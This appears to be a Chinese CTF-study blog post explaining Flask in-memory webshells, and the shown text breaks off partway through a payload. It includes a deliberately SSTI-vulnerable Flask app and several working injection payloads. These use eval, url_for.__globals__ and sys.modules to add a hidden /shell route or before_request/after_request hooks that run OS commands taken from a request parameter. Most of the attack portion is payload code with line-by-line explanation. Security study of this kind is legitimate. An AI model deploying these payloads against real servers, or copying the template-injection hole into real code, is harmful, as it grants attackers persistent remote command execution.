<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="较为基础的几种flask内存马，后续会学习关于sanic和bottle内存马">
<meta property="og:type" content="article">
<meta property="og:title" content="基于flask的内存马">
<meta property="og:url" content="http://example.com/2025/08/18/Done-%E5%9F%BA%E4%BA%8Eflask%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="Twansh&#x2F;Eminem">
<meta property="og:description" content="较为基础的几种flask内存马，后续会学习关于sanic和bottle内存马">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-08-18T09:01:12.000Z">
<meta property="article:modified_time" content="2025-09-04T13:45:22.438Z">
<meta property="article:author" content="Kwansh">
<meta property="article:tag" content="专题强化练">
<meta property="article:tag" content="内存马">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2025/08/18/Done-%E5%9F%BA%E4%BA%8Eflask%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>基于flask的内存马 | Twansh/Eminem</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Twansh/Eminem</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-links">

    <a href="/links/" rel="section"><i class="fa fa-link fa-fw"></i>友链</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2025/08/18/Done-%E5%9F%BA%E4%BA%8Eflask%E7%9A%84%E5%86%85%E5%AD%98%E9%A9%AC/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.png">
      <meta itemprop="name" content="Kwansh">
      <meta itemprop="description" content="往事越千年,魏武挥鞭,东临碣石有遗篇。萧瑟秋风今又是,换了人间">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Twansh/Eminem">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          基于flask的内存马
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2025-08-18 17:01:12" itemprop="dateCreated datePublished" datetime="2025-08-18T17:01:12+08:00">2025-08-18</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2025-09-04 21:45:22" itemprop="dateModified" datetime="2025-09-04T21:45:22+08:00">2025-09-04</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <div class="post-description">较为基础的几种flask内存马，后续会学习关于sanic和bottle内存马</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="本期推荐"><a href="#本期推荐" class="headerlink" title="本期推荐"></a>本期推荐</h2><p>泪桥 -伍佰<br>III - Athletics</p>
<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>众所周知，我们的题目可以分为出网与不出网两种模式，要是遇到可以出网的情况，最好还是弹shell，但是若是不能出网，内存马是我们的保底解<br>但是也是有特殊情况的，比如在下文我们要介绍的一种钩子函数:teardown_request，由于这种钩子函数无回显的特性，我们可以选择弹shell(也可以重定向到某个目录下)</p>
<h2 id="内存马与flask"><a href="#内存马与flask" class="headerlink" title="内存马与flask"></a>内存马与flask</h2><p>我们一般常见的python框架有Django和Flask(不知道为啥拉蒙特徐那么爱出bottle)，python的内存马中一般就是利用flask框架的ssti来进行注入，一般来说都在渲染的时候没对用户传输的代码进行过滤，所以用户可以用类似ssti的方式注入内存马，得到shell</p>
<h2 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h2><h3 id="flask的请求上下文管理机制"><a href="#flask的请求上下文管理机制" class="headerlink" title="flask的请求上下文管理机制"></a>flask的请求上下文管理机制</h3><p>在我们request进入flask的时候，就会实例化一个request context，这个时候就会分成两种上下文，一种是请求上下文(request context)，另外一种是应用上下文(session context)</p>
<p>上下文的结构均为stack的栈结构。大家都知道栈这种数据结构的特点，也就是后进先出，可以想象成一盒泡腾片，最后放进去的泡腾片会最先被拿出来</p>
<p>这个request context实例化后就拥有了一个栈的全部的特性了，在实例化后会被push到栈_request_ctx_stack中，根据这层特性就可以通过获取栈顶元素的方法来获取当前的请求</p>
<p>应用上下文:<br>current_app：当前运行的flask实例<br>g：用于在一次请求中临时存储数据的对象(如数据库连接)</p>
<p>请求上下文:<br>request：封装了http的请求信息<br>session：用户会话对象，基于cookie</p>
<h3 id="钩子的区别"><a href="#钩子的区别" class="headerlink" title="钩子的区别"></a>钩子的区别</h3><p>钩子分为两种</p>
<ol>
<li>全局钩子(所有请求)</li>
<li>模块钩子(蓝图钩子)</li>
</ol>
<h3 id="POC环境搭建"><a href="#POC环境搭建" class="headerlink" title="POC环境搭建"></a>POC环境搭建</h3><p>上网找了一个现成的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, request, render_template_string</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hello_world</span>():  <span class="comment"># put application&#x27;s code here</span></span><br><span class="line">    person = <span class="string">&#x27;knave&#x27;</span></span><br><span class="line">    <span class="keyword">if</span> request.args.get(<span class="string">&#x27;cmd&#x27;</span>):</span><br><span class="line">        person = request.args.get(<span class="string">&#x27;cmd&#x27;</span>)</span><br><span class="line">    template = <span class="string">&#x27;&lt;h1&gt;Hi, %s.&lt;/h1&gt;&#x27;</span> % person</span><br><span class="line">    <span class="keyword">return</span> render_template_string(template)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    app.run()</span><br></pre></td></tr></table></figure>

<p>可以直接在vps上试试看</p>
<h2 id="老版内存马"><a href="#老版内存马" class="headerlink" title="老版内存马"></a>老版内存马</h2><h3 id="第一种payload"><a href="#第一种payload" class="headerlink" title="第一种payload"></a>第一种payload</h3><p>在flask基础开发那里我有提到过一种添加url路由的方法，也就是add_url_rule，可以直接根据你给的参数名生成路由</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.add_url_rule(&#x27;/shell&#x27;, &#x27;shell&#x27;, lambda :__import__(&#x27;os&#x27;).popen(_request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)).read())&quot;</span>,&#123;<span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>
<p>很长一串啊，想起来了被pyjail支配的恐怖日子，丢给AI整理一手</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># 从 url_for 的全局变量里拿到必要对象</span></span><br><span class="line">builtins = url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>]</span><br><span class="line">request_ctx_stack = url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>]</span><br><span class="line">app = url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line"></span><br><span class="line"><span class="comment"># 动态执行 Python 代码：给 Flask 应用加一个 /shell 路由</span></span><br><span class="line">builtins[<span class="string">&#x27;eval&#x27;</span>](</span><br><span class="line">    <span class="string">&quot;&quot;&quot;</span></span><br><span class="line"><span class="string">app.add_url_rule(</span></span><br><span class="line"><span class="string">    &#x27;/shell&#x27;,                      # 路由路径</span></span><br><span class="line"><span class="string">    &#x27;shell&#x27;,                       # 端点名称</span></span><br><span class="line"><span class="string">    lambda: __import__(&#x27;os&#x27;)       # 路由对应的视图函数</span></span><br><span class="line"><span class="string">                 .popen(</span></span><br><span class="line"><span class="string">                     _request_ctx_stack.top.request.args.get(&#x27;cmd&#x27;, &#x27;whoami&#x27;)</span></span><br><span class="line"><span class="string">                 )</span></span><br><span class="line"><span class="string">                 .read()</span></span><br><span class="line"><span class="string">)</span></span><br><span class="line"><span class="string">    &quot;&quot;&quot;</span>,</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="string">&#x27;_request_ctx_stack&#x27;</span>: request_ctx_stack,</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>: app</span><br><span class="line">    &#125;</span><br><span class="line">)</span><br></pre></td></tr></table></figure>

<p>逐一分析解释</p>
<p>1. </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">builtins = url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>]</span><br></pre></td></tr></table></figure>
<p>拿到flask模块的全局命名空间，然后把其中的builtins类丢给了同名变量</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">request_ctx_stack = url_for.__globals__[&#x27;_request_ctx_stack&#x27;]</span><br><span class="line">app = url_for.__globals__[&#x27;current_app&#x27;]</span><br></pre></td></tr></table></figure>
<p>这两个也是同理，上文都介绍过了这两个东西<br>2.<br>后续从builtins中拿出来eval</p>
<p><strong>add_url_rule()详解</strong></p>
<p>前文有提到过相关内容，主要有5个参数</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">add_url_rule(rule, endpoint=<span class="literal">None</span>, view_func=<span class="literal">None</span>, provide_automatic_options=<span class="literal">None</span>,options)</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. rule就可以简单的理解为url路径</span><br><span class="line">2. endpoint可以理解为端点名称</span><br><span class="line">3. view_func就是视图函数</span><br><span class="line">4. provide_automatic_options: 控制是否应自动添加选项方法.</span><br><span class="line">5. options: 要转发到基础规则对象的选项,其他可选参数,比如定义运行的http方法</span><br></pre></td></tr></table></figure>

<ol start="3">
<li>看看我们的老版payload，在视图函数处定义了一个lamnda匿名函数</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">lambda</span>: <span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>)       <span class="comment"># 路由对应的视图函数</span></span><br><span class="line">                 .popen(</span><br><span class="line">                     _request_ctx_stack.top.request.args.get(<span class="string">&#x27;cmd&#x27;</span>, <span class="string">&#x27;whoami&#x27;</span>)</span><br><span class="line">                 )</span><br><span class="line">                 .read()</span><br></pre></td></tr></table></figure>

<p>这里就很显然了</p>
<p>这里定义了一个匿名函数，os-&gt;popen-&gt;拿到了栈的最顶端请求request对象(前文也有提到),然后就用cmd这个get参数，构造了一个系统命令，然后执行输出</p>
<p>老版内存马这里的lambda写在了视图函数处，所以说当中国add_url_rule被成功执行的时候，用户一旦切到所插入的&#x2F;shell的页面，就会执行这个lambda<br>所以可以达到执行whoami</p>
<ol start="4">
<li>后面那段就是局部变量字典之流</li>
</ol>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">        <span class="string">&#x27;_request_ctx_stack&#x27;</span>:url_for.__globals__[<span class="string">&#x27;_request_ctx_stack&#x27;</span>],</span><br><span class="line">        <span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="第二种payload"><a href="#第二种payload" class="headerlink" title="第二种payload"></a>第二种payload</h3><p>似乎是用了和之前XYCTF中拉蒙特徐说过的那种特性</p>
<p>也就是说一个模块其中的某个部分，如os.a这样子的拿出来重新赋值，然后再调用的时候就是我们赋的值那样(当然我感觉只是类似而已，并非相同)</p>
<p>下面这段内容摘自sun师傅的博客，我感觉讲的非常好，没有什么可以补充的了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">众所周知，sys.modules[<span class="string">&#x27;__main__&#x27;</span>]为当前运行的主模块(也就是正在执行的.py文件)对应的模块对象</span><br><span class="line">把你执行的文件当作一个模块载入</span><br><span class="line">把它的名字设为 <span class="string">&quot;__main__&quot;</span>（不管你文件叫什么）</span><br><span class="line">把这个模块的变量、函数、类都注册到 sys.modules[<span class="string">&#x27;__main__&#x27;</span>] 中</span><br><span class="line">可以等价一下</span><br><span class="line">globals()  ==  sys.modules[<span class="string">&#x27;__main__&#x27;</span>].__dict__</span><br><span class="line"></span><br><span class="line">```​</span><br></pre></td></tr></table></figure>

<p>所以我们可以去更改main里面的app(一般都是app)，把路由绑定上lambda函数，最后实现打入内存马</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">sys.modules[<span class="string">&#x27;__main__&#x27;</span>].__dict__[<span class="string">&#x27;app&#x27;</span>].add_url_rule(<span class="string">&#x27;/shell&#x27;</span>,<span class="string">&#x27;shell&#x27;</span>,<span class="keyword">lambda</span> :<span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>).popen(<span class="string">&#x27;dir&#x27;</span>).read())</span><br><span class="line">​</span><br><span class="line"><span class="built_in">__import__</span>(<span class="string">&#x27;sys&#x27;</span>).modules[<span class="string">&#x27;__main__&#x27;</span>].__dict__[<span class="string">&#x27;app&#x27;</span>].add_url_rule(<span class="string">&#x27;/shell&#x27;</span>,<span class="string">&#x27;shell&#x27;</span>,<span class="keyword">lambda</span>:<span class="built_in">__import__</span>(<span class="string">&#x27;os&#x27;</span>).popen(<span class="built_in">__import__</span>(<span class="string">&#x27;flask&#x27;</span>).request.args.get(<span class="string">&#x27;cmd&#x27;</span>)).read())</span><br></pre></td></tr></table></figure>
<p>导入模块若成功，那么打入内存马应该也是没什么问题的</p>
<h2 id="新版内存马"><a href="#新版内存马" class="headerlink" title="新版内存马"></a>新版内存马</h2><h3 id="关于特殊装饰器-钩子函数"><a href="#关于特殊装饰器-钩子函数" class="headerlink" title="关于特殊装饰器(钩子函数)"></a>关于特殊装饰器(钩子函数)</h3><p>装饰器的内容在我们前面开发的那篇博客中就已经说过了</p>
<p>常见的特殊装饰器有:</p>
<ol>
<li>before_request</li>
<li>after_request</li>
<li>errorhandler</li>
<li>teardown_appcontext</li>
<li>teardown_request</li>
</ol>
<h3 id="before-request方法"><a href="#before-request方法" class="headerlink" title="before_request方法"></a>before_request方法</h3><p>这个方法可以让我们在每次的请求之前进行一些操作，在flask的基础开发中，一般是用这个方法来进行一些预处理操作，比如身份验证</p>
<p>跟进源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">  @setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">before_request</span>(<span class="params">self, f: T_before_request</span>) -&gt; T_before_request:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;Register a function to run before each request.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        For example, this can be used to open a database connection, or</span></span><br><span class="line"><span class="string">        to load the logged in user from the session.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        .. code-block:: python</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">            @app.before_request</span></span><br><span class="line"><span class="string">            def load_user():</span></span><br><span class="line"><span class="string">                if &quot;user_id&quot; in session:</span></span><br><span class="line"><span class="string">                    g.user = db.session.get(session[&quot;user_id&quot;])</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        The function will be called without any arguments. If it returns</span></span><br><span class="line"><span class="string">        a non-``None`` value, the value is handled as if it was the</span></span><br><span class="line"><span class="string">        return value from the view, and further request handling is</span></span><br><span class="line"><span class="string">        stopped.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        This is available on both app and blueprint objects. When used on an app, this</span></span><br><span class="line"><span class="string">        executes before every request. When used on a blueprint, this executes before</span></span><br><span class="line"><span class="string">        every request that the blueprint handles. To register with a blueprint and</span></span><br><span class="line"><span class="string">        execute before every request, use :meth:`.Blueprint.before_app_request`.</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="variable language_">self</span>.before_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p>大段大段的注释<br>看到最后有一个 before_request_funcs</p>
<p>这个就是before_request装饰器的底层逻辑，作用就是把我定义的函数注册为一个请求前钩子函数</p>
<p>在这里before_request实际上调用的就是self.before_request_funcs.setdefault(None, []).append(f)<br>意思就是</p>
<ol>
<li>检查self.before_request_funcs.setdefault字典中是否有一个键为None的条目</li>
<li>若没有None键，就在字典中创建它，并且把它的值设置为一个空列表</li>
<li>无论None键是否存在，都会把f添加到这个列表中，然后before_request的时候调用</li>
</ol>
<p>这个f就是访问值，我们把f定义为一个lambda函数，那么每次请求前就可以被调用</p>
<p>这个函数在app中，我们可以通过sys.modules来夺取(这个在上面我们也有提到过)</p>
<p>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123;url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda: __import__(&#x27;os&#x27;).popen(__import__(&#x27;flask&#x27;).request.args.get(&#x27;a&#x27;)).read())&quot;</span>)&#125;&#125;&amp;a=whoami</span><br></pre></td></tr></table></figure>
<p>这里通过动态导入 sys 模块，获取当前 Flask 应用实例 app，并将一个匿名函数添加到 app 的请求前处理函数列表中，利用before_request装饰器触发自定义后门函数执行命令<br>包子王的那个先导一遍app再打payload，我感觉是挺麻烦的<br>然后再看两条其实意义也差不多的payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__.__builtins__[<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;sys.modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None, []).append(lambda:__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read())&quot;</span>)</span><br><span class="line">​</span><br><span class="line"><span class="built_in">eval</span>(<span class="string">&quot;__import__(&#x27;sys&#x27;).modules[&#x27;__main__&#x27;].__dict__[&#x27;app&#x27;].before_request_funcs.setdefault(None,[]).append(lambda :__import__(&#x27;os&#x27;).popen(&#x27;dir&#x27;).read())&quot;</span>)</span><br></pre></td></tr></table></figure>
<p>其中第二条payload中</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">__import__</span>(<span class="string">&#x27;sys&#x27;</span>).modules[<span class="string">&#x27;__main__&#x27;</span>].__dict__[<span class="string">&#x27;app&#x27;</span>]</span><br></pre></td></tr></table></figure>
<p>这个可以获取当前的flask实例，那你自然就可以得到before_request_funcs.setdefault</p>
<h3 id="after-request方法"><a href="#after-request方法" class="headerlink" title="after_request方法"></a>after_request方法</h3><p>我英语并不好，但是看到了名字也大概清楚是做什么用的</p>
<p>依然爆炒源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@setupmethod</span></span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">after_request</span>(<span class="params">self, f: T_after_request</span>) -&gt; T_after_request:</span><br><span class="line">        <span class="string">&quot;&quot;&quot;Register a function to run after each request to this object.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        The function is called with the response object, and must return</span></span><br><span class="line"><span class="string">        a response object. This allows the functions to modify or</span></span><br><span class="line"><span class="string">        replace the response before it is sent.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        If a function raises an exception, any remaining</span></span><br><span class="line"><span class="string">        ``after_request`` functions will not be called. Therefore, this</span></span><br><span class="line"><span class="string">        should not be used for actions that must execute, such as to</span></span><br><span class="line"><span class="string">        close resources. Use :meth:`teardown_request` for that.</span></span><br><span class="line"><span class="string">​</span></span><br><span class="line"><span class="string">        This is available on both app and blueprint objects. When used on an app, this</span></span><br><span class="line"><span class="string">        executes after every request. When used on a blueprint, this executes after</span></span><br><span class="line"><span class="string">        every request that the blueprint handles. To register with a blueprint and</span></span><br><span class="line"><span class="string">        execute after every request, use :meth:`.Blueprint.after_app_request`.</span></span><br><span class="line"><span class="string">        &quot;&quot;&quot;</span></span><br><span class="line">        <span class="variable language_">self</span>.after_request_funcs.setdefault(<span class="literal">None</span>, []).append(f)</span><br><span class="line">        <span class="keyword">return</span> f</span><br></pre></td></tr></table></figure>

<p>长得和before_request差不多</p>
<p>payload</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](<span class="string">&quot;app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get(&#x27;cmd&#x27;) and exec(\&quot;global CmdResp;CmdResp=__import__(\&#x27;flask\&#x27;).make_response(__import__(\&#x27;os\&#x27;).popen(request.args.get(\&#x27;cmd\&#x27;)).read())\&quot;)==None else resp)&quot;</span>,&#123;<span class="string">&#x27;request&#x27;</span>:url_for.__globals__[<span class="string">&#x27;request&#x27;</span>],<span class="string">&#x27;app&#x27;</span>:url_for.__globals__[<span class="string">&#x27;current_app&#x27;</span>]&#125;)</span><br></pre></td></tr></table></figure>
<p>但是众所周知<br>after和before的区别就是，after之后就没有response了，而before有，所以我们before的内存马可以那么构造<br>而after，仅通过lambda无法对原始传进来的response进行修改后再返回，所以需要重新生成一个response对象，然后再返回这个response<br>把payload整理一下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">url_for.__globals__[<span class="string">&#x27;__builtins__&#x27;</span>][<span class="string">&#x27;eval&#x27;</span>](</span><br><span class="line">    <span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    app.after_request_funcs.setdefault(None, []).append(</span></span><br><span class="line"><span class="string">        lambda resp: CmdResp if request.args.get(&#x27;cmd&#x27;) and exec(</span></span><br><span class="line"><span 